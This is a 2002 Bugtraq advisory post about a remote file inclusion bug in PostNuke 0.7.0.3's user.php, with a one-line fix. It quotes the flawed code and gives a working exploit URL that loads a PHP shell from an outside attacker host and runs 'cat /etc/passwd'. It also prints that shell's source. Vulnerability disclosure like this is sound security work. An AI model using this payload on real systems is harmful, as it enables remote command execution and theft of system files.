postnuke v 0.7.0.3 remote command execution
From: pokleyzz sakamaniaka (pokleyzz@hotmail.com)Date: 03/28/02
- Previous message: Florian Weimer: "Re: 1024-bit RSA keys in danger of compromise"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 28 Mar 2002 01:03:21 -0000 From: pokleyzz sakamaniaka <pokleyzz@hotmail.com> To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
post nuke is one of popular content management
system written in php . there are bug in file user.php
line 107
which user can append $caselist array with their own
value.
foreach ($caselist as $k=>$v)
{
$ModName = $v['module'];
include "$v[path]/$k";
}
$caselist = array();
http://lame_host/user.php?caselist[bad_file.txt][path]
=http://bad_host&command=cat%20/etc/passwd
bad_file.txt (put in bad_host document root):
-- start bad_file.txt -----
<pre>
<?php
system($command);
?>
-- end bad_file.txt -----
quick fix:
put on line 28 :
$caselist = array();
http://inetd-secure.net/
http://www.mybsd.org.my/pokleyzz/
- Previous message: Florian Weimer: "Re: 1024-bit RSA keys in danger of compromise"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
